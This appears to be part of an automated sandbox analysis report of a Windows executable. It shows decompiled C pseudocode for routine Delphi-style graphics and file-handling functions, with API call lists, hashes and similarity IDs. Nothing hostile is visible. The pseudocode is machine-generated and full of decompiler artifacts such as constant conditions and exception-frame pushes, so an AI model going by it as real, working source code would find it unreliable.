                                                                        • IntersectRect.USER32 ref: 0042788C
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                        • String ID: EnumDisplayMonitors
                                                                        • API String ID: 362875416-2491903729
                                                                        • Opcode ID: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction ID: 95e6c646e184b3413f1b03aee9d1c08cd6eaa1e6872ea2d6174b8da1ddef65f3
                                                                        • Opcode Fuzzy Hash: 509b17f4ff89f3f09313d7059f80117b772472ac54dbac4944b464566a9d4247
                                                                        • Instruction Fuzzy Hash: 5D311E72E0421AAFDB10DFA5DC44AEF77BCAF05314F408537F915E2241E6389905CBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E004245C2(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				struct HPALETTE__* _v12;
                                                                        				char _v13;
                                                                        				struct tagPOINT _v21;
                                                                        				struct HDC__* _v28;
                                                                        				void* _v32;
                                                                        				struct HPALETTE__* _t74;
                                                                        				signed int _t80;
                                                                        				signed int _t81;
                                                                        				char _t82;
                                                                        				void* _t89;
                                                                        				void* _t135;
                                                                        				intOrPtr* _t165;
                                                                        				intOrPtr _t173;
                                                                        				signed int _t174;
                                                                        				intOrPtr _t177;
                                                                        				intOrPtr _t179;
                                                                        				intOrPtr _t181;
                                                                        				int* _t185;
                                                                        				intOrPtr _t187;
                                                                        				void* _t189;
                                                                        				void* _t190;
                                                                        				intOrPtr _t191;
                                                                        
                                                                        				_t166 = __ecx;
                                                                        				_t189 = _t190;
                                                                        				_t191 = _t190 + 0xffffffe4;
                                                                        				_t185 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t165 = __eax;
                                                                        				_t187 =  *((intOrPtr*)(__eax + 0x28));
                                                                        				_t173 =  *0x424810; // 0xf
                                                                        				E00420804(_v8, __ecx, _t173);
                                                                        				E00424C34(_t165);
                                                                        				_v12 = 0;
                                                                        				_v13 = 0;
                                                                        				_t74 =  *(_t187 + 0x10);
                                                                        				if(_t74 != 0) {
                                                                        					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
                                                                        					RealizePalette( *(_v8 + 4));
                                                                        					_v13 = 1;
                                                                        				}
                                                                        				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
                                                                        				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
                                                                        				_pop(_t174);
                                                                        				_t81 = _t174 * _t80;
                                                                        				if(_t81 > 8) {
                                                                        					L5:
                                                                        					_t82 = 0;
                                                                        				} else {
                                                                        					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
                                                                        					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
                                                                        						_t82 = 1;
                                                                        					} else {
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        				if(_t82 == 0) {
                                                                        					if(E00424950(_t165) == 0) {
                                                                        						SetStretchBltMode(E00420730(_v8), 3);
                                                                        					}
                                                                        				} else {
                                                                        					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                                                        					SetStretchBltMode( *(_v8 + 4), 4);
                                                                        					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                                                        				}
                                                                        				_push(_t189);
                                                                        				_push(0x424801);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t191;
                                                                        				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
                                                                        					E00424BD4(_t165, _t166);
                                                                        				}
                                                                        				_t89 = E00424894(_t165);
                                                                        				_t177 =  *0x424810; // 0xf
                                                                        				E00420804(_t89, _t166, _t177);
                                                                        				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
                                                                        					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424894(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
                                                                        					_pop(_t179);
                                                                        					 *[fs:eax] = _t179;
                                                                        					_push(E00424808);
                                                                        					if(_v13 != 0) {
                                                                        						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
                                                                        					}
                                                                        					return 0;
                                                                        				} else {
                                                                        					_v32 = 0;
                                                                        					_v28 = 0;
                                                                        					_push(_t189);
                                                                        					_push(0x424796);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t191;
                                                                        					_v28 = E00420B28(CreateCompatibleDC(0));
                                                                        					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
                                                                        					E00420CCC( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424894(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
                                                                        					_t135 = 0;
                                                                        					_pop(_t181);
                                                                        					 *[fs:eax] = _t181;
                                                                        					_push(0x4247db);
                                                                        					if(_v32 != 0) {
                                                                        						_t135 = SelectObject(_v28, _v32);
                                                                        					}
                                                                        					if(_v28 != 0) {
                                                                        						return DeleteDC(_v28);
                                                                        					}
                                                                        					return _t135;
                                                                        				}
                                                                        			}


























                                                                        0x004247dd
                                                                        0x004247e0
                                                                        0x004247e3
                                                                        0x004247ec
                                                                        0x00000000
                                                                        0x004247fb
                                                                        0x00424800
                                                                        0x004246f3
                                                                        0x004246f5
                                                                        0x004246fa
                                                                        0x004246ff
                                                                        0x00424700
                                                                        0x00424705
                                                                        0x00424708
                                                                        0x00424717
                                                                        0x00424727
                                                                        0x00424761
                                                                        0x00424766
                                                                        0x00424768
                                                                        0x0042476b
                                                                        0x0042476e
                                                                        0x00424777
                                                                        0x00424781
                                                                        0x00424781
                                                                        0x0042478a
                                                                        0x00000000
                                                                        0x00424790
                                                                        0x00424795
                                                                        0x00424795

                                                                        APIs
                                                                          • Part of subcall function 00424C34: GetDC.USER32(00000000), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: ReleaseDC.USER32 ref: 00424CD8
                                                                        • SelectPalette.GDI32(?,?,000000FF), ref: 00424606
                                                                        • RealizePalette.GDI32(?), ref: 00424615
                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 00424627
                                                                        • GetDeviceCaps.GDI32(?,0000000E), ref: 00424636
                                                                        • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 0042466A
                                                                        • SetStretchBltMode.GDI32(?,00000004), ref: 00424678
                                                                        • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 00424690
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0042470D
                                                                        • SelectObject.GDI32(?,?), ref: 00424722
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CapsDevice$Palette$BrushCreateSelect$CompatibleHalftoneModeObjectRealizeReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 2358456236-0
                                                                        • Opcode ID: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction ID: 8a5360052a613d484358f7dafbb41ff6efc4df6e6b80e8dfa515692f2bc59ea2
                                                                        • Opcode Fuzzy Hash: c6f4b90d25e3a7f91d213dfbbab5338d454019bf6aa3b904367bac129662575e
                                                                        • Instruction Fuzzy Hash: 37516CB5B00215AFCB10EFA9D885F5ABBF8EB49304F51846AF508E7381D638ED00CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E0043AE5C(intOrPtr* __eax, void* __edx) {
                                                                        				struct HDC__* _v8;
                                                                        				struct HBITMAP__* _v12;
                                                                        				void* _v16;
                                                                        				struct tagPAINTSTRUCT _v80;
                                                                        				int _v84;
                                                                        				void* _v96;
                                                                        				int _v104;
                                                                        				void* _v112;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t38;
                                                                        				struct HDC__* _t59;
                                                                        				intOrPtr* _t88;
                                                                        				intOrPtr _t107;
                                                                        				void* _t108;
                                                                        				struct HDC__* _t110;
                                                                        				void* _t113;
                                                                        				void* _t116;
                                                                        				void* _t118;
                                                                        				intOrPtr _t119;
                                                                        
                                                                        				_t116 = _t118;
                                                                        				_t119 = _t118 + 0xffffff94;
                                                                        				_push(_t108);
                                                                        				_t113 = __edx;
                                                                        				_t88 = __eax;
                                                                        				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
                                                                        					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E00439AB4(_t88) != 0) {
                                                                        						_t38 = E0043A97C(_t88, _t88, _t113, _t108, _t113);
                                                                        					} else {
                                                                        						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
                                                                        					}
                                                                        					return _t38;
                                                                        				} else {
                                                                        					_t110 = GetDC(0);
                                                                        					 *((intOrPtr*)( *_t88 + 0x44))();
                                                                        					 *((intOrPtr*)( *_t88 + 0x44))();
                                                                        					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
                                                                        					ReleaseDC(0, _t110);
                                                                        					_v8 = CreateCompatibleDC(0);
                                                                        					_v16 = SelectObject(_v8, _v12);
                                                                        					 *[fs:eax] = _t119;
                                                                        					_t59 = BeginPaint(E0043CC2C(_t88),  &_v80);
                                                                        					E00437760(_t88, _v8, 0x14, _v8);
                                                                        					 *((intOrPtr*)(_t113 + 4)) = _v8;
                                                                        					E0043AE5C(_t88, _t113);
                                                                        					 *((intOrPtr*)(_t113 + 4)) = 0;
                                                                        					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x43afae, _t116);
                                                                        					 *((intOrPtr*)( *_t88 + 0x44))();
                                                                        					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
                                                                        					EndPaint(E0043CC2C(_t88),  &_v80);
                                                                        					_pop(_t107);
                                                                        					 *[fs:eax] = _t107;
                                                                        					_push(0x43afb5);
                                                                        					SelectObject(_v8, _v16);
                                                                        					DeleteDC(_v8);
                                                                        					return DeleteObject(_v12);
                                                                        				}
                                                                        			}


























                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0043AEA7
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0043AECB
                                                                        • ReleaseDC.USER32 ref: 0043AED6
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 0043AEDD
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AEED
                                                                        • BeginPaint.USER32(00000000,?,00000000,0043AFAE,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF0F
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0043AF6B
                                                                        • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0043AF7C
                                                                        • SelectObject.GDI32(00000000,?), ref: 0043AF96
                                                                        • DeleteDC.GDI32(00000000), ref: 0043AF9F
                                                                        • DeleteObject.GDI32(?), ref: 0043AFA8
                                                                          • Part of subcall function 0043A97C: BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                          • Part of subcall function 0043A97C: EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                        • String ID:
                                                                        • API String ID: 3867285559-0
                                                                        • Opcode ID: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction ID: 6c27e87496bbd68a0565411df090fbb30ca26b63d5b2c97abbe2d0871e1eec49
                                                                        • Opcode Fuzzy Hash: d13974afed72c26d1f8b7f13268e4a6461a7d17cbdf11dd2431701b7f6cf42ad
                                                                        • Instruction Fuzzy Hash: 11416A71B40204AFDB00EBA9CC85B9EB7F9EB4C704F10447AB50AEB281DA79AD15CB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 55%
                                                                        			E00443D4C(void* __eax, void* __ecx, intOrPtr __edx, void* __eflags, char _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				intOrPtr _v8;
                                                                        				struct HDC__* _v12;
                                                                        				char _v28;
                                                                        				char _v44;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				void* _t46;
                                                                        				void* _t57;
                                                                        				int _t85;
                                                                        				void* _t119;
                                                                        				void* _t120;
                                                                        				void* _t129;
                                                                        				struct HDC__* _t138;
                                                                        				struct HDC__* _t139;
                                                                        				int _t140;
                                                                        				void* _t141;
                                                                        
                                                                        				_t121 = __ecx;
                                                                        				_t137 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t120 = __eax;
                                                                        				_t46 = E00443514(__eax);
                                                                        				if(_t46 != 0) {
                                                                        					_t144 = _a4;
                                                                        					if(_a4 == 0) {
                                                                        						__eflags =  *(_t120 + 0x54);
                                                                        						if( *(_t120 + 0x54) == 0) {
                                                                        							_t140 = E004242CC(1);
                                                                        							 *(_t120 + 0x54) = _t140;
                                                                        							E004256E4(_t140, 1);
                                                                        							 *((intOrPtr*)( *_t140 + 0x40))();
                                                                        							_t121 =  *_t140;
                                                                        							 *((intOrPtr*)( *_t140 + 0x34))();
                                                                        						}
                                                                        						E0041FC50( *((intOrPtr*)(E00424894( *(_t120 + 0x54)) + 0x14)), _t121, 0xffffff, _t137, _t141, __eflags);
                                                                        						E00412BCC( *(_t120 + 0x34), 0,  &_v44,  *(_t120 + 0x30));
                                                                        						_push( &_v44);
                                                                        						_t57 = E00424894( *(_t120 + 0x54));
                                                                        						_pop(_t129);
                                                                        						E004202E8(_t57, _t129);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0xffffffff);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(E00420730(E00424894( *(_t120 + 0x54))));
                                                                        						_push(_v8);
                                                                        						_push(E004436E8(_t120));
                                                                        						L00426AE8();
                                                                        						E00412BCC(_a16 +  *(_t120 + 0x34), _a12,  &_v28, _a12 +  *(_t120 + 0x30));
                                                                        						_v12 = E00420730(E00424894( *(_t120 + 0x54)));
                                                                        						E0041FC50( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000014, _t137, _t141, __eflags);
                                                                        						_t138 = E00420730(_t137);
                                                                        						SetTextColor(_t138, 0xffffff);
                                                                        						SetBkColor(_t138, 0);
                                                                        						_t85 = _a16 + 1;
                                                                        						__eflags = _t85;
                                                                        						BitBlt(_t138, _t85, _a12 + 1,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                                                        						E0041FC50( *((intOrPtr*)(_t137 + 0x14)), _a16 +  *(_t120 + 0x34), 0x80000010, _t137, _t141, _t85);
                                                                        						_t139 = E00420730(_t137);
                                                                        						SetTextColor(_t139, 0xffffff);
                                                                        						SetBkColor(_t139, 0);
                                                                        						return BitBlt(_t139, _a16, _a12,  *(_t120 + 0x34),  *(_t120 + 0x30), _v12, 0, 0, 0xe20746);
                                                                        					}
                                                                        					_push(_a8);
                                                                        					_push(E00443310(_t144));
                                                                        					E00443D24(_t120, _t144);
                                                                        					_push(E00443310(_t144));
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(_a12);
                                                                        					_push(_a16);
                                                                        					_push(E00420730(__ecx));
                                                                        					_push(_v8);
                                                                        					_t119 = E004436E8(_t120);
                                                                        					_push(_t119);
                                                                        					L00426AE8();
                                                                        					return _t119;
                                                                        				}
                                                                        				return _t46;
                                                                        			}




















                                                                        APIs
                                                                        • 73452430.COMCTL32(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 00443DAB
                                                                        • 73452430.COMCTL32(00000000,?,00000000,00000000,00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00443E4C
                                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00443E99
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00443EA1
                                                                        • BitBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00E20746), ref: 00443EC6
                                                                          • Part of subcall function 00443D24: 73452240.COMCTL32(00000000,?,00443D85,00000000,?), ref: 00443D3A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73452430Color$73452240Text
                                                                        • String ID: DA
                                                                        • API String ID: 3810274889-2080325668
                                                                        • Opcode ID: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction ID: b45212fec9e8cfc054dcf64ae06490e4be8bfbe9f25bbab4dce699ee82f4dead
                                                                        • Opcode Fuzzy Hash: c2254ac722dfa3df87788b38a6e7611e15f13b677d4a539b87433d063c409f02
                                                                        • Instruction Fuzzy Hash: C6514F71700115AFDB40EF69DD82F9E37ECAF48714F50016AB904EB382CA78ED558B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043AAD8(void* __eax, void* __ecx, struct HDC__* __edx) {
                                                                        				struct tagRECT _v44;
                                                                        				struct tagRECT _v60;
                                                                        				void* _v68;
                                                                        				int _v80;
                                                                        				int _t79;
                                                                        				void* _t134;
                                                                        				int _t135;
                                                                        				void* _t136;
                                                                        				void* _t159;
                                                                        				void* _t160;
                                                                        				void* _t161;
                                                                        				struct HDC__* _t162;
                                                                        				intOrPtr* _t163;
                                                                        
                                                                        				_t163 =  &(_v44.bottom);
                                                                        				_t134 = __ecx;
                                                                        				_t162 = __edx;
                                                                        				_t161 = __eax;
                                                                        				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                                                                        				}
                                                                        				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                                                                        				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                                                                        					L17:
                                                                        					_t79 =  *(_t161 + 0x19c);
                                                                        					if(_t79 == 0) {
                                                                        						L27:
                                                                        						return _t79;
                                                                        					}
                                                                        					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                                                                        					if(_t79 < 0) {
                                                                        						goto L27;
                                                                        					}
                                                                        					_v44.right = _t79 + 1;
                                                                        					_t159 = 0;
                                                                        					do {
                                                                        						_t79 = E00414208( *(_t161 + 0x19c), _t159);
                                                                        						_t135 = _t79;
                                                                        						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                                                                        							_v44.left = CreateSolidBrush(E0041EFA4(0x80000010));
                                                                        							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                                                                        							FrameRect(_t162,  &_v44, _v44);
                                                                        							DeleteObject(_v60.right);
                                                                        							_v60.left = CreateSolidBrush(E0041EFA4(0x80000014));
                                                                        							E00412BCC( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                                                                        							FrameRect(_t162,  &_v60, _v60);
                                                                        							_t79 = DeleteObject(_v68);
                                                                        						}
                                                                        						_t159 = _t159 + 1;
                                                                        						_t75 =  &(_v44.right);
                                                                        						 *_t75 = _v44.right - 1;
                                                                        					} while ( *_t75 != 0);
                                                                        					goto L27;
                                                                        				}
                                                                        				_t160 = 0;
                                                                        				if(_t134 != 0) {
                                                                        					_t160 = E00414264(_t78, _t134);
                                                                        					if(_t160 < 0) {
                                                                        						_t160 = 0;
                                                                        					}
                                                                        				}
                                                                        				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                                                                        				if(_t160 <  *_t163) {
                                                                        					do {
                                                                        						_t136 = E00414208( *((intOrPtr*)(_t161 + 0x198)), _t160);
                                                                        						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                                                                        							E00412BCC( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                                                                        							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                                                                        								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                                                                        									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                                                                        								}
                                                                        								_v60.top = SaveDC(_t162);
                                                                        								E00434EE8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                                                                        								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                                                                        								E00437760(_t136, _t162, 0xf, 0);
                                                                        								RestoreDC(_t162, _v80);
                                                                        								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                                                                        							}
                                                                        						}
                                                                        						_t160 = _t160 + 1;
                                                                        					} while (_t160 < _v60.top);
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                        • String ID:
                                                                        • API String ID: 375863564-0
                                                                        • Opcode ID: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction ID: 0b65945d901311baf0f71d7817378dc12ba5f118a77a7d6de250862080b77c6d
                                                                        • Opcode Fuzzy Hash: a339bbe9dbde8620f25859f2c879bc2d89aaec14b1b7b84054d5a770207a83ca
                                                                        • Instruction Fuzzy Hash: A4516F712042449FD714DF29C8C4B5B77E9AF88308F04445EFE86CB296D639E891CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00402B40(void** __eax) {
                                                                        				long _t29;
                                                                        				void* _t31;
                                                                        				long _t34;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				long _t41;
                                                                        				int _t44;
                                                                        				void* _t46;
                                                                        				long _t54;
                                                                        				long _t55;
                                                                        				void* _t58;
                                                                        				void** _t59;
                                                                        				DWORD* _t60;
                                                                        
                                                                        				_t59 = __eax;
                                                                        				 *((intOrPtr*)(__eax + 0xc)) = 0;
                                                                        				 *((intOrPtr*)(__eax + 0x10)) = 0;
                                                                        				if(0xffffffffffff284f == 0) {
                                                                        					_t29 = 0x80000000;
                                                                        					_t55 = 1;
                                                                        					_t54 = 3;
                                                                        					 *((intOrPtr*)(__eax + 0x1c)) = 0x402a94;
                                                                        				} else {
                                                                        					if(0xffffffffffff284f == 0) {
                                                                        						_t29 = 0x40000000;
                                                                        						_t55 = 1;
                                                                        						_t54 = 2;
                                                                        					} else {
                                                                        						if(0xffffffffffff284f != 0) {
                                                                        							return 0xffffffffffff284d;
                                                                        						}
                                                                        						_t29 = 0xc0000000;
                                                                        						_t55 = 1;
                                                                        						_t54 = 3;
                                                                        					}
                                                                        					_t59[7] = E00402AD4;
                                                                        				}
                                                                        				_t59[9] = E00402B20;
                                                                        				_t59[8] = E00402AD0;
                                                                        				if(_t59[0x12] == 0) {
                                                                        					_t59[2] = 0x80;
                                                                        					_t59[9] = E00402AD0;
                                                                        					_t59[5] =  &(_t59[0x53]);
                                                                        					if(_t59[1] == 0xd7b2) {
                                                                        						if(_t59 != 0x4963e4) {
                                                                        							_push(0xfffffff5);
                                                                        						} else {
                                                                        							_push(0xfffffff4);
                                                                        						}
                                                                        					} else {
                                                                        						_push(0xfffffff6);
                                                                        					}
                                                                        					_t31 = GetStdHandle();
                                                                        					if(_t31 == 0xffffffff) {
                                                                        						goto L37;
                                                                        					}
                                                                        					 *_t59 = _t31;
                                                                        					goto L30;
                                                                        				} else {
                                                                        					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
                                                                        					if(_t38 == 0xffffffff) {
                                                                        						L37:
                                                                        						_t59[1] = 0xd7b0;
                                                                        						return GetLastError();
                                                                        					}
                                                                        					 *_t59 = _t38;
                                                                        					if(_t59[1] != 0xd7b3) {
                                                                        						L30:
                                                                        						if(_t59[1] == 0xd7b1) {
                                                                        							L34:
                                                                        							return 0;
                                                                        						}
                                                                        						_t34 = GetFileType( *_t59);
                                                                        						if(_t34 == 0) {
                                                                        							CloseHandle( *_t59);
                                                                        							_t59[1] = 0xd7b0;
                                                                        							return 0x69;
                                                                        						}
                                                                        						if(_t34 == 2) {
                                                                        							_t59[8] = E00402AD4;
                                                                        						}
                                                                        						goto L34;
                                                                        					}
                                                                        					_t59[1] = _t59[1] - 1;
                                                                        					_t40 = GetFileSize( *_t59, 0) + 1;
                                                                        					if(_t40 == 0) {
                                                                        						goto L37;
                                                                        					}
                                                                        					_t41 = _t40 - 0x81;
                                                                        					if(_t41 < 0) {
                                                                        						_t41 = 0;
                                                                        					}
                                                                        					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
                                                                        						goto L37;
                                                                        					} else {
